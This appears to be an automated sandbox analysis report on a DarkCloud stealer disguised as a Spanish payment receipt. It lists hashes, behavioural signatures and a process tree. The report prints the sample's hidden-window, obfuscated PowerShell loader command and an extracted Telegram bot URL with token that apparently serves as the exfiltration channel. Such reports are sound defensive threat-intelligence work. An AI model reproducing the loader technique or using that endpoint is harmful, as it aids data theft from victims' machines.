Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
146s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-es -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-eslocale:es-esos:windows10-ltsc 2021-x64systemwindows -
submitted
12/03/2025, 11:38
Static task
static1
Behavioral task
behavioral1
Sample
comprobante de pago.exe
Resource
win10ltsc2021-20250217-es
Behavioral task
behavioral2
Sample
Skyldsflelsers.ps1
Resource
win10ltsc2021-20250217-es
General
-
Target
comprobante de pago.exe
-
Size
819KB
-
MD5
969da5cc61a21e2d5fd00a52254ecd8e
-
SHA1
3f3cb9fdf47343f8e4d88e5171ad3b57ed6c4bad
-
SHA256
20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18
-
SHA512
6df74d8e45b5db927d8962e453f379b18ba79dce91a8e0677b55a36c1a57f38c43f677091d280d1abcbcad2b214299aeb02f2784047411e2d62a6e0912556e60
-
SSDEEP
12288:1gP0I82X5K+GDnvy1eSLR0lUEkyZtyj6ittqTH3oEuprboHlExvyBBApy2HIxod3:EFJsDnylcpZk64oYEGc+yTARioCLC
Malware Config
Extracted
darkcloud
https://api.telegram.org/bot7733877678:AAEqT6ly9PGheBCvOkuDttTsF2fRwpgtX5s/sendMessage?chat_id=5039346757
Signatures
-
Darkcloud family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3696 powershell.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 23 1828 msiexec.exe 25 1828 msiexec.exe 27 1828 msiexec.exe 29 1828 msiexec.exe 31 1828 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 drive.google.com 23 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1828 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3696 powershell.exe 1828 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language comprobante de pago.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1828 msiexec.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 3060 wrote to memory of 3696 3060 comprobante de pago.exe 84 PID 3060 wrote to memory of 3696 3060 comprobante de pago.exe 84 PID 3060 wrote to memory of 3696 3060 comprobante de pago.exe 84 PID 3696 wrote to memory of 4832 3696 powershell.exe 93 PID 3696 wrote to memory of 4832 3696 powershell.exe 93 PID 3696 wrote to memory of 4832 3696 powershell.exe 93 PID 3696 wrote to memory of 2260 3696 powershell.exe 94 PID 3696 wrote to memory of 2260 3696 powershell.exe 94 PID 3696 wrote to memory of 2260 3696 powershell.exe 94 PID 3696 wrote to memory of 1828 3696 powershell.exe 95 PID 3696 wrote to memory of 1828 3696 powershell.exe 95 PID 3696 wrote to memory of 1828 3696 powershell.exe 95 PID 3696 wrote to memory of 1828 3696 powershell.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\comprobante de pago.exe"C:\Users\Admin\AppData\Local\Temp\comprobante de pago.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\Admin\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵PID:4832
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵PID:2260
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1828
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
347KB
MD5b309e0c56e116ca4bb506532d3301d26
SHA1dd262120aff0dcc56ca5c142dfe9a2e0c5a754a6
SHA256f32f4655ae63807af3841e5b4f806b4cac43cc993417fc74ff0403e8037efa39
SHA5120976fa442e5ba759922f738cc0aad568573b88d941a6b1d5cf9b09643566b59736c69d75ad20f7b73c35bcc0f602e498c4498c32a7c3273a7e4729701ff2a1cb
-
Filesize
51KB
MD5550953a2f63ed2b48ebf6f76343105dc
SHA1f9425cafc739b32c655b05afdf9a5930337f2a54
SHA256f4c99919eaf75b521f3e08ec3e4378cc546a07de51735e48d7cf9110a4afec3c
SHA512956bb1f66503873a3b721875123c485ca47e7f9f9ce14ce451a2a4b0f1c705b40774ac1569bdb41e83758e880586e1f7740598b3112744e0b68720ae4e0deab3